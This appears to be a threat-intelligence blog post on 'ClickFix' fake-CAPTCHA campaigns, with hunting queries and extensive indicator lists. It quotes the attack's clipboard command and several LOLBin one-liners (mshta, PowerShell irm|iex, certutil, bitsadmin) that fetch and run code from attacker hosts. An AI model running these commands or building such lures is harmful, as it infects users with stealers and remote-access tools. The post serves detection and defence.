Surge in “ClickFix” Fileless Attacks Leveraging LOLBins on Windows
Security analysts have observed a sharp rise in “ClickFix”-style campaigns since late 2024, with activity peaking in 2026, wherein phishing…
Surge in “ClickFix” Fileless Attacks Leveraging LOLBins on Windows
Security analysts have observed a sharp rise in “ClickFix”-style campaigns since late 2024, with activity peaking in 2026, wherein phishing or malvertising lures trick users into essentially infecting themselves. Users land on fake CAPTCHA or update pages and are instructed to copy-and-paste commands into the Windows Run dialog. When executed, these commands invoke native binaries (living-off-the-land binaries, or LOLBins) like mshta.exe, forfiles.exe, cmd.exe, certutil.exe, or PowerShell itself to fetch and run remote payloads entirely in memory.
What Is ClickFix? & Why Does It Work So Well?
ClickFix is a user-assisted execution technique where victims are tricked into copying and pasting malicious commands into the Windows Run dialog (Win + R).
The lure typically looks benign:
- A fake CAPTCHA or “verification failed” message
- A browser error or document loading issue
- A prompt claiming “manual verification required”
The fix is always the same:
“Press Win + R, paste this command, and hit Enter to continue.”
Once executed, the command abuses living-off-the-land binaries (LOLBins) already present on Windows to download and execute malicious code- often without dropping files to disk. ClickFix attacks succeed because they avoid classic malware behaviors. There’s No exploit, No suspicious attachment, No unsigned executable Instead, attackers rely on:
- Legitimate Windows binaries
- Manual user execution
- Fileless or in-memory payloads
This makes the activity harder to block pre-execution and easier to explain away as “normal system behavior.”

Fake BSOD Page

Fake Captcha page
Initial Access: Compromised Website + Fake CAPTCHA
A legitimate but compromised site injected a malicious JavaScript loader that redirected users to a fake CAPTCHA page. The CAPTCHA instructed users to “verify” by pasting a command into the Windows Run dialog.
Injected / Redirected Scripts
hxxps://dinozozo[.]com/menu.jshxxps://pippyheydguide[.]com/redirect/profile-script.jshxxps://pippyheydguide[.]com/redirect/middleware-service.php?gvefGY13hxxps://pippyheydguide[.]com/redirect/middleware-effect.js?2718cdb882b4f057aa
ClickFix Clipboard Payload (User-Executed)
The CAPTCHA page silently copied the following command to the clipboard:
forfiles /p c:\windows\system32 /m notepad.exe /c “cmd /c start mshta http://<ATTACKER C2 SERVER IP>”
Network Traffic Generated
Execution of the ClickFix command resulted in staged redirects and payload delivery:
hxxp://193.111.208[.]238/auth→ 301hxxps://lpiaretes[.]com/authhxxp://193.111.208[.]238/byte→ 301hxxps://lpiaretes[.]com/byte
The redirect-based infrastructure allows attackers to rotate backend delivery while keeping the ClickFix command static.
A Typical ClickFix Execution Flow
- User visits a compromised or malicious website
- Page displays a fake CAPTCHA/ BSOD Screen/ other verification prompt to trick user
- JavaScript copies a hidden command to the clipboard
- User pastes the command into Win + R
- Native Windows tools download and execute remote content
- Payload runs in memory (often an infostealer or RAT)
Common LOLBins Used in ClickFix Attacks
Most observed ClickFix chains abuse a small set of trusted Windows utilities:

- **forfiles.exe**:
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /c start mshta hxxp://193.111.208[.]238/auth" - cmd.exe:
cmd /c start mshta hxxp://193.111.208[.]238/auth - mshta.exe:
mshta hxxp://193.111.208[.]238/auth - powershell.exe:
powershell -w hidden -c "irm hxxp://lpiaretes[.]com/byte | iex" - rundll32.exe:
rundll32.exe C:\Users\[user]\AppData\Local\temp.dll,Start - bitsadmin.exe:
bitsadmin /transfer job hxxp://lpiaretes[.]com/byte C:\Users\[user]\file.zip - certutil.exe:
certutil -urlcache -split -f hxxp://lpiaretes[.]com/byte payload.zip
MITRE ATT&CK Mapping : ClickFix

MITRE ATTACK MAPING
Threat Hunting Queries
Below are practical threat-hunting queries aligned specifically to this ClickFix → LOLBins → RAT attack chain. The queries can be tailored according to specific SIEM platforms
ParentImage=”explorer.exe” AND Image IN (“mshta.exe”,”cmd.exe”,”forfiles.exe”,”powershell.exe”) AND CommandLine LIKE “%http%”
Image IN (“cmd.exe”,”mshta.exe”,”forfiles.exe”,”powershell.exe”,”rundll32.exe”) AND ParentImage = “explorer.exe” AND CommandLine LIKE “%http%”
CommandLine LIKE “%forfiles%” AND CommandLine LIKE “%mshta%” AND CommandLine LIKE “%http%”
Indicators of Compromise (IOC) for ClickFix-Style Attacks
- ClickFix/Remcos campaign:
dinozozo[.]com,pippyheydguide[.]com,lpiaretes[.]com. - SentinelOne report (fake CAPTCHA):
andrixdesign[.]com,cubawebcars[.]com,geo[.]netsupportsoftware[.]com,b-cdn[.]net,selbe[.]ar. numerous *.trycloudflare[.]com domains (bidder-horizontal-wildlife-invoice.trycloudflare[.]com,bristol-weed-martin-know.trycloudflare[.]com,musicians-forestry-operation-angels.trycloudflare[.]com,name-kw-papua-booking.trycloudflare[.]com,peter-secrets-diana-yukon.trycloudflare[.]com,zoloft-indianapolis-riders-convinced.trycloudflare[.]com) - HHS Sector Alert (Google Meet lures): Phishing domains impersonating Google Meet-
meet[.]google[.]us-join[.]com,meet[.]googie[.]com-join[.]us,meet[.]google[.]com-join[.]us,meet[.]google[.]web-join[.]com,meet[.]google[.]webjoining[.]com,meet[.]google[.]us07host[.]com;googiedrivers[.]com. - HHS (Fake CAPTCHA infection):
us18web-zoom[.]us,webapizmland[.]com,carolinejuskus[.]com. - AMOS Stealer cluster (HHS):
alienmanfc6[.]com,apunanwu[.]com,bowerchalke[.]com,cautrucanhtuan[.]com,cphoops[.]com,dekhke[.]com,iloanshop[.]com,kansaskollection[.]com,lirelasuisse[.]com,mdalies[.]com,mensadvancega[.]com,mishapagerealty[.]com,modoodeul[.]com,pabloarruda[.]com,pakoyayinlari[.]com,patrickcateman[.]com,phperl[.]com,stonance[.]com,utv4fun[.]com. - Trend Micro (fake CAPTCHA lures):
ernier[.]shop,zb-files[.]oss-ap-southeast-1[.]aliyuncs[.]com,ok[.]fish-cloud-jar[.]us,yedik[.]shop,x63-hello[.]live,welcome12-world[.]com,w19-seasalt[.]com,fessoclick[.]com,nejyd[.]icu,kajec[.]icu. Also phishing redirect domains:guests-reservid[.]com,guest-idreserve[.]com,idguset-reserve[.]com,guestdocfound[.]com,itemsfoundguest[.]com,guestitemsfound[.]com,viewer-vccpass[.]com. - Cynet (fake CAPTCHA demo):
recapchav3[.]com. - Huntress ClickFix lures: Numerous
*.consent-verify.pages[.]devsites (e.g.1e442295.consent-verify.pages[.]dev,5df43170.consent-verify.pages[.]dev,3b4ce6c9.consent-verify.pages[.]dev,6b04000.consent-verify.pages[.]dev,f6b04000.consent-verify.pages[.]dev,3e6eb645.consent-verify.pages[.]dev,d9e71335.consent-verify.pages[.]dev); and “Windows Update” lure domains:hypudyk[.]shop,squatje[.]su,bendavo[.]su,conxmsw[.]su,narroxp[.]su,squeaue[.]su,ozonelf[.]su,exposqw[.]su,vicareu[.]su. - ClickFix Robot Lure (Lumma) domains (Huntress):
xmcniiadpwqw[.]site,xcvcxoipoeww[.]site,xoiiasdpsdoasdpojas[.]com,xpoalswwkjddsljsy[.]com,galaxyswapper[.]pro. - Windows Update Lure domains (Huntress):
cmevents[.]live,cmevents[.]pro,cosmicpharma-bd[.]com,groupewadesecurity[.]com,sportsstories[.]gr,virhtechgmbh[.]com.
IP Addresses
193[.]111[.]208[.]238(SmartApeSG redirect/C2).192[.]144[.]56[.]80(Remcos C2).23[.]227[.]203[.]162,23[.]254[.]144[.]106(JavaScript reverse shell C2, NetSupport activity).65[.]38[.]120[.]47,65[.]109[.]226[.]176(JavaScript C2).94[.]247[.]42[.]153,104[.]26[.]1[.]231,108[.]170[.]60[.]188(outbound NetSupport connections).141[.]193[.]213[.]10,141[.]193[.]213[.]11(PowerShell download resolution).188[.]245[.]205[.]83(WinRM outbound).77[.]221[.]157[.]170(Google Meet phishing).95[.]182[.]97[.]58(Stealc C2).91[.]103[.]140[.]200(Rhadamanthys C2).85[.]209[.]11[.]155(AMOS Stealer C2).192[.]124[.]176[.]103(Huntress “Windows Update” lure site).104[.]21[.]57[.]40(Cynet Cloudflare IP forrecapchav3.com).185[.]7[.]214[.]54(XWorm RAT C2).81[.]90[.]29[.]64(stego loader host).141[.]98[.]80[.]175(stego loader/Rhadamanthys infrastructure).94[.]74[.]164[.]136(Windows Update lure Stage1).
URLs/Paths
- Script resources:
https://dinozozo[.]com/menu.js;https://pippyheydguide[.]com/redirect/profile-script.js,https://pippyheydguide[.]com/redirect/middleware-service.php?gvefGY13,https://pippyheydguide[.]com/redirect/middleware-effect.js?2718cdb882b4f057aa - ClickFix execution URLs:
http://193[.]111[.]208[.]238/auth→ redirected tohttps://lpiaretes[.]com/auth;http://193[.]111[.]208[.]238/byte→https://lpiaretes[.]com/byte. - Payload download:
https://googiedrivers[.]com/fix-error;https://us18web-zoom[.]us/stealc.exe,https://us18web-zoom[.]us/ram.exe;https://webapizmland[.]com/api/cmdruned;https://carolinejuskus[.]com/kusaka.php?call=launcher. - C2 & dropper URLs:
http://95[.]182[.]97[.]58/84b7b6f977dd1c65.php;http://91[.]103[.]140[.]200:9078/3936a074a2f65761a5eb8/6fmfpmi7.fwf4p;http://85[.]209[.]11[.]155/joinsystem. - Cynet demo:
https://recapchav3[.]com/lpzbX1KYZM8CLL0r(Invoked by mshta). - Huntress stage 1:
http://81[.]90[.]29[.]64/ebc/rps.gz. - Huntress stage 2:
http://corezea[.]com/ebc. - Huntress Robot Lure URLs:
http://141[.]98[.]80[.]175/tick.odd,http://141[.]98[.]80[.]175/gpsc.dat,http://141[.]98[.]80[.]175/ercx.dat,http://141[.]98[.]80[.]175/rtdx.dat,http://141[.]98[.]80[.]175/very.dat. - Huntress Robot Stage2:
http://securitysettings[.]live,http://xoiiasdpsdoasdpojas[.]com. - Huntress Windows Update lure:
http://94[.]74[.]164[.]136/fifx.odd.
File Hashes (SHA256)
bcf13c1e79ebffba07dcc635c05a5d2f826fe75b4e69f7541b6ce6af4a5e31c0(Remcos RAT drop).92a8cc4e385f170db300de8d423686eeeec72a32475a9356d967bee9e3453138(malicious HTML payload).a834be6d2bec10f39019606451b507742b7e87ac8d19dc0643ae58df183f773c(Stealc stealer payload).2853a61188b4446be57543858adcc704e8534326d4d84ac44a60743b1a44cbfe(Rhadamanthys payload).94379fa0a97cc2ecd8d5514d0b46c65b0d46ff9bb8d5a4a29cf55a473da550d5(AMOS Stealer payload).
메타데이터
- post_id
- 78be68fa5b22
- slug
- surge-in-clickfix-fileless-attacks-leveraging-lolbins-on-windows-78be68fa5b22
- url
- https://meetcyber.net/surge-in-clickfix-fileless-attacks-leveraging-lolbins-on-windows-78be68fa5b22
- canonical_url
- https://meetcyber.net/surge-in-clickfix-fileless-attacks-leveraging-lolbins-on-windows-78be68fa5b22
- author_url
- https://medium.com/@yeshuwanjari.work
- status
- ok
- fetched_at
- 2026-07-13 11:44:12